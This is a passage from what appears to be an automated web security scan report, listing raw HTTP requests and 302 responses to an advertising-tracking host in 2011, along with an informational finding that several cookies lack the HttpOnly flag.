gDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN9L9XlOlhjCqMTK6hyRPhgO8/StXBMiwvUtfk2+f8pQBVnH6C1XL1Gj8ORJBPU0K18kquspNa2xO16VkbVFmPmFED/ROfss5MyaTFfhDp+yuExR1/a/IX2Hsyr1RynCW3gOqnFCbXsrgMNvCjwrXqmW2SlkxMp41EdMh9G78sGWNa/7GgZLldatK42V74Yg88W1YkZYf4F9AsRF3ZJU9DT1GHinjto6CMfbUZHldNeJBI6Flkjn2aekrtvERgpwmTyxMruLCaTR9t2E+Hj4dpKoaF4RblayFT/zAnvz2zkNwTna5rE/qk7Q+LphTnobN4Hb4fOsR4xMJVxQOqMgY5elWxPq4MbAA4pr9NcZGvV75dLPsz196Bi/xLxZb8iUPsr91zpM4TgqyjuOtnP0lITIukH4pqFfI4PAuqIffOunVFSOU+KJNu9RTMJv3MjLvRTQKWMJzx4Q+yKHmJCBbAPelw0lKw7E1yBNbQD9fS9KaCUyagBuyoH/dxaWYFEq0KJmG+9Dj0/SQE7msZCu6fHMFzfqi; rtc_M6m_=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==; rsiPus_nlnh="MLsXrqMOLjproBAxuuKo7xC/v0lmTlecDqSiToO8phWAnpO+YSTKFqU3TDxxVRk18Y3VCTjL0ah6bV8hWqwKPejoJrdpYW+maSaE+SE+JYHAqw/wQUT1qX7wDv68KC/ogKITsb9dC8gdu0uA7sN+LTYfo6fDEvy97fr0sfCIWg/dl5X5uzDg9KOQN8uVmwRirSVhkHVm0KyQbnTUGsc2ZQvcAhR0xzocc/zo82+gM1RCIH+HSCGErtUUZc9RJCGEmtyJa50VtG6uhU13oDsoWTBcH+pKwA+EFmS5nr9l5tca9Gn0G15id7IFw3BzD4Tvch7eJWmhiUjCLEDfLl0gbdj+ckvbdlfP3VayclAOz29lDjEAIM7evWDsxAp95So743zgvTRtdCe4oiCVigVSbNlYtf2gls9w4/Rbe+tmpqScTnQCnaNQwIizICQvruNgmFH/6+lojkVGlNDz5Ky3rTgx4Lb7FGgQFqtNmVDkIrLBzE5vX3eGdFDbFFVsTp88ZqFbUCErpL3v70oO0vaq8n4dLXBDnlJvcS6JdnjRk9xkIe69ZW1oeNhnpjXeiCaYl4LhoNHPSyKqNQcopy21Lq6Fx65Ehc1L/Zo9a+T+ilMYjIAgks58mh41keirnpuezj6yRhV7JX2rrCEqT/hJNxX7y2JcARkB1nMRRB8Zj9SHmrYZ638tSYG3b90lhgWBLXv0LDarrDfBS1eszRzd+qY471tll+fm92jvMhKTIDlOLkVopd2x+0aEKBYWNNN3k3toyRwrKsE4hBORWYMZSTdPaYPOQ1UPnovWcZpohcny7FCN8FH6hqZu6WJ0bE7KXD9+iEBSpnGNcjuJ57gNCQUER3dnilXxUU035Ub31YKYngAcRd67M4oL+VtrIgTE1ftBWaJU5hTHGEe4Nz2Zci3y3xXI6G85vV5OQZPwMjZ5we4k3N9bf3L5Db5oz9FeCksBpZVkBjxTqBRYGfoO/jdzHDYmpioDH7T49AzUBkFAhbVGacpYyYl5p0wOriiZcw3ZFQoSD4yzLpEu3nFozzx0"; rsi_us_1000000="pUMlIz9DOAYU1O2WA3Nf1wgg9Tpj7P+Tw3jzv8rD7yvDmvWDQ0Y8a5KAq8B98fA1QmRNDddtH/dK+uIMHXn850oVpZ6hBQpRqWE9VPS5Xy7XGW2RoRccmRQldIeS8HXSTpZFxGDjrLBA6xGO31q5lEKg7q/Zqa3Eh3raYFPi2iq2P/WUJ8LzKuLWOFTjNfjCk/0VNg4UoWYInFurSNSQ+aUh/C47rdGNAf1Dg1oVK6qn87HdFN4KIp8qp25VM4TSqlPz6cg1zQD2GwFFfzhKwHp0kGxTZK6jX8ZnXISB8sXcy0D55JrXRUETl0uoI4QVbKEZF/5dx1gs9ptsf6SthAIG43IlegqXwtMLrqqpTk/JyFQ2StgdP9FYuRHDpLz+OHzUQh1vrm5xKjX3+Q640exxVIfbO5itfUNxo5BZqgcjww3GikxnYg5fSYMvW08WJalwrMzbnGLl0KXXJ46jOVLE0Rb0yvlFoNktRzKMye9waAvctfzuH9EHwibUfXt190PEJ4A+Sg0AcAp7kOwVeDkiN2MCb3r1WPXuHm3y8pbsO2binEZAAOMbMCz6CtX91Rgn2EzUAx81QjGglnztOuUFRFlI7kjMQeXLGKWBRZdSe6eYTB6Lnh18LdQ5agXYqBlP5eTr0pdews3C7wuHkSy+cjD2XlZOYEMXQn9PuBTSjNA/XlMSRQqc9WomgO0U1VW9Z7NS9+gZx4/DR1GwAkIBjPHU5AlJIaaxmJASLwvjIxrX5KW3zZGf/mjfA2cFyChzAGmctIpu+Vd7ARiWWqAIi6cgvytaV2BRdBlrXFkhSMrlmfawqiVLWJ+RfqZK7gaVrut3WnrJOVMXXqr7CtxUK6a2Pn/1EfyMPFJStSe6uI0JDgJOOUXIh0/QlT3bEiUUzklRDfiLQQg9qZceXx0I0CFus/5FTGi3aSsJ/iOmQ7U7lJyS2obs9TpltQ/ufeib9k1qvREJYFLBR0z5bFhcp5yzXQbaEFx8ymNOXnS1itZUINjWC8jdy5PsuUT+JDJXPtf/HEu1N4a99erdLdqPuj+ki8RVgjGf1QVPdRYQN5Ikpkk0MRA5SSlsc87Euf+syX6f0SaGqcOA+LMY28by9BOfF4CjwojIYLQA7CTMmShGLD7QIoYNPB9pH3S/WcquP8g8yavfDQBU+QwcMOiGx/GukIS2j/H4BDvCbywCrbiyLf0IsbRg+/vZyQlnl03yTrzUhfJGYADGtKLHujYIlWVJ2juevHA9vZrI2f0zNZZFT5Ox5BJBvBcQLenCuVaRyx9ZwQYz5yUzskZStzZiHbYlVsH1sWxuxzg1xSosd3Tq17MFdy1sDZD30OeKip7ei44DiArBocEjjeNpiyKtXSdt7rrwtwl36hGrMTrfhX6+/bn0kr2hGgVBE+oKtf3pVCXZqMHah6gq1RieAs/KWLv+Kc38x5h3OOZj9/KY5a5+y4Drg4l7b9rJsCgZP8zktKSaeNFEIDZ35+CtVymuq0xkEBJifIs="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_M6m_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15E+huAIMpqaIQFMFwqim7rCI4rfK4iOHXhPolbdVqa7OUicFRaeJooUUZKyvzikWBlKU5VPLQhd3sPpP+0bvuYvT98yo6AuyG3zQot2ZK0rTT30MK82st/RhmDz/ynmLnjPA+8089Bzyp5vs77iuejNIG9ygzsHCFJY+P81pzuk/HxbRgvnq9urCwUbMCth/V3AYpdEqSYeZGw6pxnXtNNBAZ8JLeSlhXSVTnS8dAWAbvCG+nKrTQa1XxQuzEzgppHoc8Q8I5hkczyahzaR92FZ4qGkwlZwA2pipdFjJAmhUE4MsVQEk4W0nbCBX2i7fX3JDKc9vHnLHUuAmS/QaXr94ukCj5eKXLr3Lmhr571kb++2iCayqULCMbD3m4M+HnM2t1F/kiuAk1UGrDaLKBTCS9lbs21J8FGflcdpaPRMrVSAACvGqhmisugCNTMif6i/V+qPvLFTUP0KqaTYxC7SM/mPkyDILNutxgcsfziGsJZLw6LREx7KzvLvx+LJUJzmAGMuYz/181rxvedutesb6ow==; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:17:48 GMT; Path=/
Set-Cookie: rtc_DsnD=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:17:48 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:17:48 GMT

13.45. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_dGQ8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
